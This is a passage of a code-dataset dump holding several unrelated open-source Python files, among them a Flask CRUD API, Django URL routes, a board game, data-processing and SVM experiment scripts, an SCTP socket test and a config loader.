configuration data\"\"\"\n\n    def get(self, dimension_name):\n        \"\"\"Get dimensions\n        all: GET /api/v1/dimensions/\n        one: GET /api/v1/dimensions/name\n        \"\"\"\n        # return str(current_app.config)\n        data_interface = current_app.config.data_interface\n\n        try:\n            if dimension_name is None:\n                data = []\n                data = data_interface.read_dimensions(skip_coords=True)\n            else:\n                data = {}\n                data = data_interface.read_dimension(dimension_name, skip_coords=True)\n\n            response = jsonify({\"data\": data, \"error\": {}})\n        except SmifException as err:\n            response = jsonify({\"data\": data, \"error\": parse_exceptions(err)})\n\n        return response\n\n    def post(self):\n        \"\"\"Create a dimension:\n        POST /api/v1/dimensions\n        \"\"\"\n        data_interface = current_app.config.data_interface\n        data = request.get_json() or request.form\n\n        try:\n            data = check_timestamp(data)\n            data_interface.write_dimension(data)\n        except SmifException as err:\n            response = jsonify(\n                {\"message\": \"failed\", \"data\": data, \"error\": parse_exceptions(err)}\n            )\n        else:\n            response = jsonify({\"message\": \"success\"})\n\n        response.status_code = 201\n        return response\n\n    def put(self, dimension_name):\n        \"\"\"Update a dimension:\n        PUT /api/v1/dimensions\n        \"\"\"\n        data_interface = current_app.config.data_interface\n        data = request.get_json() or request.form\n\n        try:\n            data = check_timestamp(data)\n            
data_interface.update_dimension(dimension_name, data)\n        except SmifException as err:\n            response = jsonify(\n                {\"message\": \"failed\", \"data\": data, \"error\": parse_exceptions(err)}\n            )\n        else:\n            response = jsonify({\"message\": \"success\"})\n\n        response.status_code = 200\n        return response\n\n    def delete(self, dimension_name):\n        \"\"\"Delete a dimension:\n        DELETE /api/v1/dimensions\n        \"\"\"\n        data_interface = current_app.config.data_interface\n        data_interface.delete_dimension(dimension_name)\n        response = jsonify({})\n        return response\n\n\ndef check_timestamp(data):\n    \"\"\"Check for timestamp and parse to datetime object\"\"\"\n    if \"stamp\" in data:\n        try:\n            data[\"stamp\"] = dateutil.parser.parse(data[\"stamp\"])\n        except ValueError:\n            pass\n    return data\n\n\ndef parse_exceptions(exception):\n    \"\"\"Parse a group of exceptions so that it can be sent over\n    the http-api\n    \"\"\"\n    if type(exception) == SmifDataError:\n        msg = defaultdict(list)\n        for ex in exception.args[0]:\n            msg[str(type(ex).__name__)].append(_parse_exception(ex))\n    else:\n        msg = {}\n        msg[str(type(exception).__name__)] = [_parse_exception(exception)]\n\n    return msg\n\n\ndef _parse_exception(ex):\n    \"\"\"Parse a single exception so that it can be sent over\n    the http-api\n    \"\"\"\n    if type(ex) == SmifValidationError:\n        msg = ex.args[0]\n    if type(ex) == SmifDataInputError:\n        msg = {\n            \"component\": ex.component,\n            \"error\": ex.error,\n            \"message\": ex.message,\n        }\n    if type(ex) == SmifDataNotFoundError:\n        msg = ex.args[0]\n    return msg\n","repo_name":"nismod/smif","sub_path":"src/smif/http_api/crud.py","file_name":"crud.py","file_ext":"py","file_size_in_byte":15681,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"}
{"seq_id":"39818844680","text":"from django.urls import path\n\nfrom Todo.views import (\n    ToDoListAPI,\n    ToDoDetailAPI,\n    ToDoOrderChangingAPI,\n    CompletedListAPI,\n    CompletedDetailAPI,\n    CompletedTodayListAPI,\n    CategoryListAPI,\n    CategoryDetailAPI,\n)\n\nurlpatterns = [\n    path(\"\", ToDoListAPI.as_view()),\n    path(\"/category\", CategoryListAPI.as_view()),\n    path(\"/category/<int:pk>\", CategoryDetailAPI.as_view()),\n    path(\"/<int:pk>\", ToDoDetailAPI.as_view()),\n    path(\"/change-order-number\", ToDoOrderChangingAPI.as_view()),\n    path(\"/completed\", CompletedListAPI.as_view()),\n    path(\"/completed/today\", CompletedTodayListAPI.as_view()),\n    path(\"/completed/<int:pk>\", CompletedDetailAPI.as_view()),\n]","repo_name":"cwadven/React-ToDo-List-Backend","sub_path":"Todo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"22212458497","text":"from typing import List\nfrom collections import Counter\n\n\nclass Solution:\n\tdef leastInterval(self, tasks: List[str], n: int) -> int:\n\t\tif n == 0: \n\t\t\treturn len(tasks)\n\t\tfrequency = Counter(tasks)\n\n\t\thf = max(frequency.values())\n\n\t\tcount = 0\n\t\tfor task, occ in frequency.items():\n\t\t\tif occ == hf:\n\t\t\t\tcount += 1\n\n\n\t\tgap = (hf-1)*(n+1) + count\n\n\t\treturn max(gap, len(tasks))","repo_name":"AyushSingh-github/Leetcode","sub_path":"621-task-scheduler/621-task-scheduler.py","file_name":"621-task-scheduler.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"29494675750","text":"# Module that sets up the whole environment of the troll game, as well as the launching of games\nimport Strategies as strat\n\nclass Plateau : # Object that holds a game situation (number of stones for each player, number of squares, troll position).
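\n    # Class-level defaults; the instance values set in __init__ shadow them.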
\n    nbCases = 7\n    posTroll = 4\n    nbPierresJoueur1 = 15\n    nbPierresJoueur2 = 15\n\n\n    def __init__(self, _nbCases, _posTrollDepart, _pierresJ1Depart, _pierresJ2Depart):\n        self.nbCases = _nbCases\n        self.posTroll = _posTrollDepart\n        self.nbPierresJoueur1 = _pierresJ1Depart\n        self.nbPierresJoueur2 = _pierresJ2Depart\n\n\n\n\n\n\n\ndef Partie(mode,_nbCases,_posTrollDepart,_pierresJ1Depart,_pierresJ2Depart,CoupsJ1 = [],CoupsJ2 = []) : # Launch a game according to the game mode (how many players), the various game parameters, and two lists, passed by reference, for the history of the moves played\n    plateau = Plateau(_nbCases,_posTrollDepart,_pierresJ1Depart,_pierresJ2Depart)\n    print(plateau.nbCases,\" \",plateau.posTroll,\" \",plateau.nbPierresJoueur1,\" \",plateau.nbPierresJoueur2) # display the initial situation\n    fin = False\n    while not fin :\n        print(plateau.nbCases, \"cases, Troll a la position : \", plateau.posTroll, \" J1 : \",plateau.nbPierresJoueur1,\" pierres, J2 : \",plateau.nbPierresJoueur2,\" pierres\") # display the current situation\n\n        if mode < 2 : # The \"mode\" variable of the game: 0 = 2 players, 1 = 1 player against an AI, 2 = 2 AIs.\n            bon = False\n            while not bon :\n                print(\"Joueur 1, rentrez une valeur !\")\n                StrCoupJ1 = input()\n                try : # player 1 enters a move\n                    CoupJ1 = int(StrCoupJ1)\n                    if CoupJ1 <= plateau.nbPierresJoueur1 and CoupJ1 > 0 :\n                        bon = True\n                except ValueError:\n                    print(\"entrez une valeur entiere svp\")\n            CoupsJ1.append(CoupJ1)\n        else : # if it is not a human player, call a function that returns the number of stones thrown; these live in the Strategies module.\n            #CoupJ1 = strat.StrategieAleatoire(plateau.nbPierresJoueur1)\n            CoupJ1 = strat.StrategiePrudente(plateau.nbPierresJoueur1,plateau.nbPierresJoueur2,plateau.nbCases,plateau.posTroll)\n            #CoupJ1 = strat.StrategieContreExercice3(_pierresJ1Depart,plateau.nbPierresJoueur1)\n            #CoupJ1 = strat.StrategieAgressive(_pierresJ1Depart,plateau.nbCases,plateau.nbPierresJoueur1)\n            #CoupJ1 = strat.Strategie1(15,7,plateau.nbPierresJoueur1,plateau.nbPierresJoueur2,plateau.posTroll,1)\n            CoupsJ1.append(CoupJ1)\n\n        if mode == 0 :\n            bon = False\n            while not bon :\n                print(\"Joueur 2, rentrez une valeur !\")\n                StrCoupJ2 = input()\n                try : # player 2 enters a move\n                    CoupJ2 = int(StrCoupJ2)\n                    if CoupJ2 <= plateau.nbPierresJoueur2 and CoupJ2 > 0 :\n                        bon = True\n                except ValueError:\n                    print(\"entrez une valeur entiere svp\")\n            CoupsJ2.append(CoupJ2)\n        else : # if it is not a human player, call a function that returns the number of stones thrown; these live in the Strategies module.\n            #CoupJ2 = strat.StrategieAgressive(_pierresJ2Depart,plateau.nbCases,plateau.nbPierresJoueur2)\n            #CoupJ2 = strat.StrategieAleatoireExercice3(plateau.nbPierresJoueur2)\n            CoupJ2 = strat.StrategieContreExercice3(_pierresJ2Depart,plateau.nbPierresJoueur2)\n            #CoupJ2 = strat.StrategiePrudenteJ2(plateau.nbPierresJoueur1,plateau.nbPierresJoueur2,plateau.nbCases,plateau.posTroll)\n            #CoupJ2 = strat.Strategie1(15,7,plateau.nbPierresJoueur2,plateau.nbPierresJoueur1,plateau.posTroll,2)\n            #CoupJ2 = strat.StrategiePrudenteNonLineaireJ2(plateau.nbPierresJoueur1,plateau.nbPierresJoueur2,plateau.nbCases,plateau.posTroll)\n            CoupsJ2.append(CoupJ2)\n        plateau.nbPierresJoueur1 -= CoupJ1\n        plateau.nbPierresJoueur2 -= CoupJ2\n        if CoupJ1 > CoupJ2:\n            plateau.posTroll += 1 \n        elif CoupJ1 < CoupJ2:\n            plateau.posTroll -= 1 \n        if 
(plateau.nbPierresJoueur1 <= 0 or plateau.nbPierresJoueur2 <= 0 or plateau.posTroll == plateau.nbCases or plateau.posTroll == 1) : # If a player has no stones left, or if the troll has reached its destination, the game stops. \n            fin = True\n    return ElectionJoueurGagnant(plateau) # 1 = player 1 won, 2 = player 2 won, 0 = draw\n\n\n\ndef ElectionJoueurGagnant (plateau) : \n    if plateau.posTroll == 1 : # victory conditions according to the troll's position\n        print(\"Joueur 2 gagne ! \")\n        return 2\n    elif plateau.posTroll == plateau.nbCases :\n        print(\"Joueur 1 gagne ! \")\n        return 1\n    else : # if the troll has not reached its destination, move the troll according to each player's remaining stones, then elect the winner according to the troll's final position.\n        if plateau.nbPierresJoueur1 <= 0 :\n            plateau.posTroll -= plateau.nbPierresJoueur2\n        elif plateau.nbPierresJoueur2 <= 0 :\n            plateau.posTroll += plateau.nbPierresJoueur1\n        print(\"Troll position : \",plateau.posTroll)\n        if plateau.posTroll <= plateau.nbCases//2 :\n            print(\"Joueur 2 gagne !\")\n            return 2\n        elif plateau.posTroll == (plateau.nbCases//2) + 1 :\n            print(\"Match nul !\")\n            return 0\n        else :\n            print(\"Joueur 1 gagne !\")\n            return 1\n\n\ndef ConfigPartie(CoupsJ1 = [],CoupsJ2 = []) : # Complete configuration of a game from a terminal. It is possible to skip this step and call the Partie function directly.\n    bon = False\n    bonModeDeJeu = False\n    bonJoueur1 = False\n    bonCases = False\n    bonTroll = False\n    bonJoueur2 = False\n    while not bon :\n        while not bonModeDeJeu : \n            print(\"selection mode de jeu : 0 = 2 joueurs, 1 = joueur VS IA, 2 = IA VS IA \")\n            SelectModeDeJeu = input()\n            try :\n                SMDJ = int(SelectModeDeJeu)\n                if SMDJ >= 0 and SMDJ <= 2 :\n                    bonModeDeJeu = True\n            except ValueError:\n                print(\"0 = 2 joueurs, 1 = joueur VS IA, 2 = IA VS IA\")\n        while not bonCases : \n            print(\"selection du nombre de cases de la partie\")\n            cases = input()\n            try :\n                nbCases = int(cases)\n                if nbCases >= 3 :\n                    bonCases = True\n            except ValueError:\n                print(\"Error\")\n\n        while not bonTroll : \n            print(\"selection de la position initiale du troll\")\n            troll = input()\n            try :\n                posTroll = int(troll)\n                if posTroll > 1 and posTroll < nbCases :\n                    bonTroll = True\n            except ValueError:\n                print(\"Error\")\n\n        while not bonJoueur1 : \n            print(\"selection du nombre de pierres pour le joueur 1\")\n            pierresJoueur1 = input()\n            try :\n                nbPierresJoueur1 = int(pierresJoueur1)\n                if nbPierresJoueur1 >= 1 :\n                    bonJoueur1 = True\n            except ValueError:\n                print(\"Error\")\n        \n        while not bonJoueur2 : \n            print(\"selection du nombre de pierres pour le joueur 2\")\n            pierresJoueur2 = input()\n            try :\n                nbPierresJoueur2 = int(pierresJoueur2)\n                if nbPierresJoueur2 >= 1 :\n                    bonJoueur2 = True\n            except ValueError:\n                print(\"Error\")\n        bon = bonCases and bonModeDeJeu and bonTroll and bonJoueur1 and bonJoueur2\n    \n    return Partie(SMDJ,nbCases,posTroll,nbPierresJoueur1,nbPierresJoueur2, CoupsJ1, CoupsJ2)\n","repo_name":"Asriell/TrollETChateau","sub_path":"JeuDuTroll/JeuDuTroll.py","file_name":"JeuDuTroll.py","file_ext":"py","file_size_in_byte":7953,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"18975309805","text":"import csv\nimport random\n\nINDEX_CLASS_ID = 4\n# This script extracts a balanced dataset from an exported ammod csv;\n# the smallest class's sample count defines the amount taken from every other class\nDATA_FILEPATH = 
\"/home/tsa/projects/libro-animalis/data/exported/210812_AMMOD_25Classes/ammod-multi-val.csv\"\nCLASS_FILEPATH = \"ammod-class-list.csv\"\nwith open(CLASS_FILEPATH) as classFile, open(DATA_FILEPATH) as dataFile:\n dataframe = csv.reader(dataFile, delimiter=\";\", quotechar=\"|\",)\n fieldnames = dataframe.__next__()\n classlist = csv.reader(classFile, delimiter=\";\", quotechar=\"|\",)\n classlist.__next__()\n classIds = []\n for x in classlist:\n classIds.append(x[0])\n\n dictClassIds = {i: [] for i in classIds}\n\n for x in dataframe:\n if(x[INDEX_CLASS_ID] == 'annotation_interval'):\n continue\n dictClassIds[x[INDEX_CLASS_ID]].append(x)\n # print(dictClassIds)\n# get min length of class\nmin_length = dataframe.line_num\nfor key in dictClassIds:\n if len(dictClassIds[key]) < min_length:\n print(key, \"->\", len(dictClassIds[key]))\n min_length = len(dictClassIds[key])\ncounter = 0\nfor key in dictClassIds:\n print('{} {}: {}'.format(counter, key,len(dictClassIds[key])))\n counter +=1\nresult = []\nfor key in dictClassIds:\n random.shuffle(dictClassIds[key])\n result.extend(dictClassIds[key][:min_length])\n\nwith open(\"balanced_labels.csv\", \"w\", newline=\"\") as csvfile:\n writer = csv.writer(csvfile, delimiter=\";\", quotechar=\"|\",)\n writer.writerow(fieldnames)\n writer.writerows(result)\n","repo_name":"hdogan84/database","sub_path":"src/extract_balanced_set.py","file_name":"extract_balanced_set.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41492304441","text":"#!/usr/bin/env python3.7\n\nfrom encode import create_vectors\nfrom sklearn.svm import OneClassSVM\nfrom sklearn.svm import SVC\nfrom reader import get_traces\nimport numpy as np\nimport os\nimport re\nfrom random import shuffle\n\n\ndef one_class(log_name, vectors, train, test, normal_traces, output_file):\n nus = [0.05, 0.1, 0.3, 0.5]\n\n for nu in nus:\n print(log_name, nu)\n ocsvm = OneClassSVM(kernel='linear', nu=nu)\n ocsvm.fit(train)\n classes = list(ocsvm.predict(test))\n\n anom_cases = [vectors[k] for k, x in enumerate(classes) if x == -1]\n normal_cases = [vectors[k] for k, x in enumerate(classes) if x == 1]\n\n anom_checked = [is_normal(t, normal_traces) for t in anom_cases]\n normal_checked = [is_normal(t, normal_traces) for t in normal_cases]\n\n print(log_name, \n \"oc\", \n len(anom_checked), \n anom_checked.count(True), \n anom_checked.count(False), \n len(normal_checked), \n normal_checked.count(True), \n normal_checked.count(False),\n nu, file=output_file, sep=\",\")\n\n\ndef supervised(log_name, vectors, train, test, normal_traces, labels, output_file):\n\n svc = SVC(kernel='linear')\n svc.fit(train, labels)\n classes = list(svc.predict(test))\n\n anom_cases = [vectors[k] for k, x in enumerate(classes) if x == -1]\n normal_cases = [vectors[k] for k, x in enumerate(classes) if x == 1]\n\n anom_checked = [is_normal(t, normal_traces) for t in anom_cases]\n normal_checked = [is_normal(t, normal_traces) for t in normal_cases]\n print(log_name, \n \"sv\", \n len(anom_checked), \n anom_checked.count(True), \n anom_checked.count(False), \n len(normal_checked), \n normal_checked.count(True), \n normal_checked.count(False),\n -1, file=output_file, sep=\",\")\n\n\ndef batch(output_name):\n normal_traces1 = [line.strip('\\n') for line in open(\"normal_pn1.txt\", 'r')]\n normal_traces2 = [line.strip('\\n') for line in open(\"normal_pn2.txt\", 'r')]\n output_file = open(\"outputs/\" + output_name + \".csv\", 
\"w+\")\n print(\"log,method,size0,normal0,anom0,size1,normal1,anom1,nu\", file=output_file)\n for filename in os.listdir(\"logs\"):\n filename = re.sub(r\"\\.csv$\", \"\", filename)\n\n if filename == \"xes\": continue\n\n vectors = get_traces(\"logs/\" + filename + \".csv\")\n shuffle(vectors)\n v = create_vectors(\"models_size16/\" + filename + \".model\", vectors)\n\n\n limit = int(len(vectors) * 0.7)\n train, test = v[:limit], v[limit:]\n \n\n if filename.startswith(\"log1\"):\n labels = np.array([1 if is_normal(trace, normal_traces1) else -1 for trace in vectors[:limit]])\n one_class(filename, vectors, train, test, normal_traces1, output_file)\n if filename != \"log1\": supervised(filename, vectors, train, test, normal_traces1, labels, output_file)\n elif filename.startswith(\"log2\"):\n labels = np.array([1 if is_normal(trace, normal_traces2) else -1 for trace in vectors[:limit]])\n one_class(filename, vectors, train, test, normal_traces2, output_file)\n if filename != \"log2\": supervised(filename, vectors, train, test, normal_traces2, labels, output_file)\n\n\ndef is_normal(vector, normal_traces):\n # if true, it is a normal behaviour\n return \" \".join(vector) in normal_traces\n\n\nfor i in range(1,11):\n batch(\"output\" + str(i))\n","repo_name":"n0mori/tcc","sub_path":"svm.py","file_name":"svm.py","file_ext":"py","file_size_in_byte":3477,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39699059047","text":"from tkinter import *\n\nmaster = Tk()\n\ndef callback():\n print(\"click!\")\n\nframe = Frame(master) # Crear un contenedor (marco)\nframe.pack()\n\nb = Button(frame, text=\"OK\", command=callback, padx=132, pady=132,\n activebackground=\"green\", activeforeground=\"yellow\",\n background=\"black\", foreground=\"red\")\nb.pack(side=LEFT) # Empaquetar el botón a la izquierda dentro del contenedor\n\na = Button(frame, text=\"OK\", command=callback, padx=132, pady=132,\n state=DISABLED, background=\"black\", disabledforeground=\"blue\")\na.pack(side=LEFT) # Empaquetar el segundo botón a la izquierda dentro del contenedor\n\nmainloop()\n","repo_name":"ricardodure/cursopython","sub_path":"labmio/test4.py","file_name":"test4.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32894881517","text":"from src.simulation import simulate_data\nimport torch\nimport numpy as np\nimport random\nimport os\n\nn_genes = 50\nn_cells = 20\n\nif not os.path.isdir('data/shared/'):\n os.makedirs('data/shared/')\n\nfor i in range(10):\n for intensity_scale in [50, 100, 200, 300, 400]:\n torch.manual_seed(i)\n np.random.seed(i)\n random.seed(i)\n\n data = simulate_data(\n n_genes=n_genes,\n n_cells=n_cells,\n n_factors=3,\n factor_images_dir='factors/',\n intensity_scales=torch.tensor([intensity_scale]).repeat(n_cells, n_genes),\n weight_sparsity=0.7,\n )\n\n torch.save(\n data,\n 'data/shared/{}_{}.pt'.format(i, intensity_scale)\n )","repo_name":"bioFAM/FISHFactor","sub_path":"data/simulated/simulate_shared.py","file_name":"simulate_shared.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"53"} +{"seq_id":"70718062247","text":"import _sctp\nimport sctp\nfrom sctp import *\nimport time\n\nclient = \"127.0.0.1\"\nserver = \"127.0.0.1\" \ntcpport = 10000\n\nif _sctp.getconstant(\"IPPROTO_SCTP\") != 132:\n\traise(Exception(\"getconstant failed\"))\ntcp 
= sctpsocket_tcp(socket.AF_INET)\n\nsaddr = (server, tcpport)\n \nprint(\"TCP %r ----------------------------------------------\" % (saddr, ))\n\ntcp.initparams.max_instreams = 3\ntcp.initparams.num_ostreams = 3\n\ntcp.events.clear()\ntcp.events.data_io = 1\n\ntcp.connect(saddr)\n\ntcp.sctp_send(b\"ABCDEF: TEST SUCCEEDED (test_local_cnx.py (C) 2009 Philippe Langlois)\\n\\l\")\nwhile 1:\n fromaddr, flags, msgret, notif = tcp.sctp_recv(1000)\n print(\" Msg arrived, flag %d\" % flags)\n\n if flags & FLAG_NOTIFICATION:\n raise(Exception(\"We did not subscribe to receive notifications!\"))\n #else:\n print(\"%s\" % msgret)\n\ntcp.close()\n","repo_name":"P1sec/pysctp","sub_path":"test_local_cnx.py","file_name":"test_local_cnx.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":157,"dataset":"github-code","pt":"53"} +{"seq_id":"12906626766","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\nimport yaml\nimport logging\nimport inspect\nimport datetime\nimport calendar\nfrom sqlalchemy import create_engine\nfrom alchemysession import AlchemySessionContainer\nfrom PIL import Image, ImageDraw, ImageFont\n\nPYTHON_PATH = os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir))\nsys.path.append(PYTHON_PATH)\nos.environ[\"PYTHONUNBUFFERED\"] = \"1\"\n\nPROJECT_HOME_DIR, i_filename = os.path.split(__file__)\n# print(f'##### {PROJECT_HOME_DIR}:{i_filename}')\nconf_dir = f'{PROJECT_HOME_DIR}/config/'\nconf = yaml.safe_load(open(f'{PROJECT_HOME_DIR}/config/settings.yaml'))\n\nIS_RUN_LOCAL = False\nif os.path.exists(conf_dir+'local.conf'):\n IS_RUN_LOCAL = True\n print(\"Run local!!\")\n\nLOGS_PATH = PROJECT_HOME_DIR + '/logs/'\nLOGS = conf['PATHS']['LOGS']\n\n\nWEBDRIVER = conf['PATHS']['WEBDRIVER']\nIMAGES_OUT_PATH = conf['PATHS']['IMAGES_OUT_PATH']\nRESULTS_PATH = conf['PATHS']['RESULTS_PATH']\nETF_HOLDINGS_URL = conf['PATHS']['ETF_HOLDINGS_URL']\n\nEOD_API_KEY = conf['EODHISTOCICALDATA']['API_KEY']\n\n# ============================== Common Settings ======================\nMONTH_FREE_REQUEST_LIMIT = conf['COMMON_SETTINGS']['MONTH_FREE_REQUEST_LIMIT']\nPORTFOLIO_FREE_SIZE_LIMIT = conf['COMMON_SETTINGS']['PORTFOLIO_FREE_SIZE_LIMIT']\nPORTFOLIO_NEW_USER_SIZE_LIMIT = conf['COMMON_SETTINGS']['PORTFOLIO_NEW_USER_SIZE_LIMIT']\nPORTFOLIO_VIP_USER_SIZE_LIMIT = conf['COMMON_SETTINGS']['PORTFOLIO_VIP_USER_SIZE_LIMIT']\nNEW_USER_TRIAL_PERIOD = conf['COMMON_SETTINGS']['NEW_USER_TRIAL_PERIOD']\nNEW_USER_FREE_REQUEST_PERIOD = conf['COMMON_SETTINGS']['NEW_USER_FREE_REQUEST_PERIOD']\n\n# ============================== Quote Loader ======================\n\nDEFAULT_START_QUOTES_DATE = SQL_USER = conf['SQL']['DEFAULT_START_QUOTES_DATE']\nUNIVERSE_TABLE_NAME = conf['SQL_TABLE_NAMES']['UNIVERSE_TABLE_NAME']\nHIST_UNIVERSE_TABLE_NAME = conf['SQL_TABLE_NAMES']['HIST_UNIVERSE_TABLE_NAME']\nTINKOFF_UNIVERSE_TABLE_NAME = conf['SQL_TABLE_NAMES']['TINKOFF_UNIVERSE_TABLE_NAME']\nTINKOFF_HIST_UNIVERSE_TABLE_NAME = conf['SQL_TABLE_NAMES']['TINKOFF_HIST_UNIVERSE_TABLE_NAME']\nQUOTE_TABLE_NAME = conf['SQL_TABLE_NAMES']['QUOTE_TABLE_NAME']\nPORTFOLIO_ALLOCATION_TABLE_NAME = conf['SQL_TABLE_NAMES']['PORTFOLIO_ALLOCATION_TABLE_NAME']\nHIST_PORT_ALLOCATION_TABLE_NAME = conf['SQL_TABLE_NAMES']['HIST_PORT_ALLOCATION_TABLE_NAME']\nPORTFOLIO_RETURNS_TABLE_NAME = conf['SQL_TABLE_NAMES']['PORTFOLIO_RETURNS_TABLE_NAME']\nPORTFOLIO_BARS_TABLE_NAME = conf['SQL_TABLE_NAMES']['PORTFOLIO_BARS_TABLE_NAME']\nETF_FOR_SCRAPE = conf['ETF_FOR_SCRAPE']\nETFs = 
conf['ETFs']\nEXCLUDE_SECTORS = conf['EXCLUDE_SECTORS']\nEXCLUDE_TICKERS = conf['EXCLUDE_TICKERS']\nNOT_EXCLUDE_TICKERS = conf['NOT_EXCLUDE_TICKERS']\nVALID_EXCHANGE = conf['VALID_EXCHANGE']\nDELISTED_TICKERS = conf['DELISTED_TICKERS']\nRECENTLY_DELISTED = conf['RECENTLY_DELISTED']\nSIMFIN_PATH = \"\" + PROJECT_HOME_DIR + \"/\" + conf['PATHS']['SIMFIN_PATH']\nBENCHMARKS = conf['BENCHMARKS']\nBENCHMARKS_QUOTES_TABLE_NAME = conf['SQL_TABLE_NAMES']['BENCHMARKS_QUOTES_TABLE_NAME']\nCURRENCY_PRICE_TABLE_NAME = conf['SQL_TABLE_NAMES']['CURRENCY_PRICE_TABLE_NAME']\n\n# ============================== Portfolios ======================\n\nPARKING = conf['PORTFOLIOS']['PARKING']\nALL_WEATHER = conf['PORTFOLIOS']['ALL_WEATHER']\nBALANCED = conf['PORTFOLIOS']['BALANCED']\nAGGRESSIVE = conf['PORTFOLIOS']['AGGRESSIVE']\nLEVERAGED = conf['PORTFOLIOS']['LEVERAGED']\nTEST_ADM = conf['PORTFOLIOS']['TEST_ADM']\nSAC_PARKING = conf['PORTFOLIOS']['SAC_PARKING']\nSAC_BALANCED = conf['PORTFOLIOS']['SAC_BALANCED']\nSAC_GROWTH = conf['PORTFOLIOS']['SAC_GROWTH']\n\n# ============================== Charter ======================\nCHARTER_IMAGES_PATH = \"\" + PROJECT_HOME_DIR + \"/\" + conf['PATHS']['CHARTER_IMAGES_PATH']\nSTATS_PATH = \"\" + PROJECT_HOME_DIR + \"/\" + conf['PATHS']['STATS_PATH']\nTESTER_RESULT_PATH = \"\" + PROJECT_HOME_DIR + \"/\" + conf['PATHS']['TESTER_RESULT_PATH']\n# *************** Settings for candlestick chart\nIMAGE_WIDTH = conf['CHARTER_CANDLE_CHART']['IMAGE_WIDTH']\nIMAGE_HEIGHT = conf['CHARTER_CANDLE_CHART']['IMAGE_HEIGHT']\nTITLE_FONT_COLOR = conf['CHARTER_CANDLE_CHART']['TITLE_FONT_COLOR']\nEXTRA_DAYS = conf['CHARTER_CANDLE_CHART']['EXTRA_DAYS']\nAXIS_FONT_COLOR = conf['CHARTER_CANDLE_CHART']['AXIS_FONT_COLOR']\nCHART_BACKGROUND_COLOR = conf['CHARTER_CANDLE_CHART']['CHART_BACKGROUND_COLOR']\nOUTER_BACKGROUND_COLOR = conf['CHARTER_CANDLE_CHART']['OUTER_BACKGROUND_COLOR']\nGRID_LINE_COLOR = conf['CHARTER_CANDLE_CHART']['GRID_LINE_COLOR']\nWATERMARK_TEXT_COLOR = conf['CHARTER_CANDLE_CHART']['WATERMARK_TEXT_COLOR']\nCANDLE_UP_COLOR = conf['CHARTER_CANDLE_CHART']['CANDLE_UP_COLOR']\nCANDLE_DOWN_COLOR = conf['CHARTER_CANDLE_CHART']['CANDLE_DOWN_COLOR']\nCANDLE_SHADOW_COLOR = conf['CHARTER_CANDLE_CHART']['CANDLE_SHADOW_COLOR']\nCOMPARISON_LINE_COLOR = conf['CHARTER_CANDLE_CHART']['COMPARISON_LINE_COLOR']\n\n# *************** Settings for histogram chart\nH_IMAGE_WIDTH = conf['CHARTER_HISTOGRAM']['IMAGE_WIDTH']\nH_IMAGE_HEIGHT = conf['CHARTER_HISTOGRAM']['IMAGE_HEIGHT']\nH_AXIS_FONT_COLOR = conf['CHARTER_HISTOGRAM']['AXIS_FONT_COLOR']\nH_TITLE_FONT_COLOR = conf['CHARTER_HISTOGRAM']['TITLE_FONT_COLOR']\nH_WATERMARK_TEXT_COLOR = conf['CHARTER_HISTOGRAM']['WATERMARK_TEXT_COLOR']\nBAR_UP_COLOR = conf['CHARTER_HISTOGRAM']['BAR_UP_COLOR']\nBAR_DOWN_COLOR = conf['CHARTER_HISTOGRAM']['BAR_DOWN_COLOR']\nHIST_BACKGROUND_COLOR = conf['CHARTER_HISTOGRAM']['HIST_BACKGROUND_COLOR']\n\n# *************** Settings for pie chart\nP_IMAGE_WIDTH = conf['CHARTER_PIE']['IMAGE_WIDTH']\nP_IMAGE_HEIGHT = conf['CHARTER_PIE']['IMAGE_HEIGHT']\nP_BACKGROUND_COLOR = conf['CHARTER_PIE']['PIE_BACKGROUND_COLOR']\nP_TITLE_FONT_COLOR = conf['CHARTER_PIE']['TITLE_FONT_COLOR']\nP_OUTER_BACKGROUND_COLOR = conf['CHARTER_PIE']['OUTER_BACKGROUND_COLOR']\nP_AXIS_FONT_COLOR = conf['CHARTER_PIE']['AXIS_FONT_COLOR']\n\n# ============================== SQL Connect ======================\nif os.path.exists(conf_dir+'local.conf'):\n SQL_DB_NAME = conf['SQL_LOCAL']['DB_NAME']\n SQL_USER = conf['SQL_LOCAL']['DB_USER']\n SQL_PASSWORD = 
